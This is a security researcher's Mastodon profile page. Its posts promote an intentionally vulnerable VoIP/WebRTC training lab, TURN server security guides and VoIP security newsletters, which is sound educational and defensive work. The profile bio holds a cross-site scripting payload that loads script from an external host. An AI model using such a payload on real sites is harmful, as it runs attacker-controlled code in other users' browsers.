Sandro Gauci

@sandrogauci
50 Followers
54 Following
32 Posts
mostly harmless
"'><script/src=//x-x.cc>
Enable Securityhttps://infosec.exchange/@enablesecurity
Sandro Gauci1d ago

RE: https://infosec.exchange/@enablesecurity/116300709031150946

VoIP/WebRTC security has needed a DVWA equivalent for a long time. We built DVRTC: full dockerized VoIP stack, intentionally vulnerable, 7 guided exercises.

Live instance at pbx1.dvrtc.net โ€” try it now.

https://www.enablesecurity.com/blog/introducing-dvrtc-damn-vulnerable-real-time-communications/

#infosec #webrtc #voipsecurity #penetrationtesting #training

Sandro GauciFeb 25

RE: https://infosec.exchange/@enablesecurity/116130697375709804

Published the "how to fix it" companion to our TURN security threats post. Best practices guide + coturn config templates at three security levels.

Also discussing TURN security on WebRTC Live today: https://webrtc.ventures/webrtc-live/

https://www.enablesecurity.com/blog/turn-security-best-practices/
https://www.enablesecurity.com/blog/coturn-security-configuration-guide/

#infosec #webrtc #security #TURN #coturn #voip

Show threadSandro GauciFeb 12
@fredposner thanks !
Sandro GauciFeb 12

RE: https://infosec.exchange/@enablesecurity/116057294204565643

Wrote up our RTCon 2025 talk on TURN security threats. TURN servers are basically open proxies with extra steps. At DEF CON someone showed C2 over Zoom's TURN infra.

https://www.enablesecurity.com/blog/turn-server-security-threats/
#infosec #webrtc #security #TURN #penetrationtesting #voip

Show threadSandro GauciOct 31
@fredposner @enablesecurity this one is a long one!
Sandro GauciOct 31
Fred PosnerOct 31
Monthly reminder that there are those who read what @sandrogauci / @enablesecurity writes, and those who wish they had. #security #rtc #voip
https://www.enablesecurity.com/newsletter/2025-10-rtcsec-news/
October 2025: RTP attacks, Cisco VoIP phones, satellite leaks, and nation-state breaches

October 2025 RTCSec newsletter: RTP Bleed and Inject discussions, critical Cisco VoIP phone vulnerabilities, satellite communication leaks, Ribbon Communications breach, and comprehensive security updates

Sandro GauciOct 1
Show threadEnable SecurityOct 1

@fredposner @sandrogauci Thanks for the post! This one covers:

FreePBX troubles and fixes (CVE-2025-57819 + more)
Voice-AI meets toll fraud ๐Ÿ“ž๐Ÿ’ธ
RTP Bleed clarifications for DTLS-SRTP
TURN security deep-dive
+ Qualcomm & Chrome WebRTC vulns

https://www.enablesecurity.com/newsletter/2025-09-rtcsec-news/

September 2025: more RTP, FreePBX and Voice AI vulnerabilities this time

September 2025 RTCSec newsletter: more RTP, FreePBX and Voice AI vulnerabilities this time

Sandro GauciOct 1
Fred PosnerSep 30

End of the month which means it's time for me to link the @enablesecurity newsletter and say...

"There are those who read what @sandrogauci writes... and those who wish they had."

https://www.enablesecurity.com/newsletter/2025-09-rtcsec-news/

September 2025: more RTP, FreePBX and Voice AI vulnerabilities this time

September 2025 RTCSec newsletter: more RTP, FreePBX and Voice AI vulnerabilities this time

Sandro GauciDec 19, 2024
Fred PosnerDec 19, 2024

Last time for 2024...

There are those who read what @sandrogauci / @enablesecurity write, and those who wish they had.

https://www.enablesecurity.com/newsletter/2024-12-rtcsec-news/

#voip #webrtc

December 2024: Wrap-Up & Latest VoIP and WebRTC Security News

December 2024 RTCSec newsletter: Year-end review of VoIP & WebRTC security, featuring major breaches, vulnerability reports, and key achievements in RTC security.

Sandro GauciDec 2, 2024
Fred PosnerNov 29, 2024

As I say every issueโ€ฆ there are those who read what @enablesecurity / @sandrogauci write and those who wish they had.

https://www.enablesecurity.com/newsletter/2024-11-rtcsec-news/?utm_medium=email&_hsenc=p2ANqtz--Dm7VzxJmDQ-izmClmezAv11KPZ3J0jvEpr0PDAbOf1BQKgf45CrGR0dvWxytolaMOpFLoOqq-PJW7L38Id0-i7GNhHA&_hsmi=336230030&utm_content=336230030&utm_source=hs_email

#voip #rtc #webrtc #security

November 2024: Breaking VoIP & WebRTC โ€“ Exploits, Vulnerabilities, and Shodan Insights

November 2024 RTCSec newsletter: Uncover critical VoIP and WebRTC security insights, including Messenger exploits, vulnerabilities in Cisco phones and video codecs, and Shodan-revealed threats.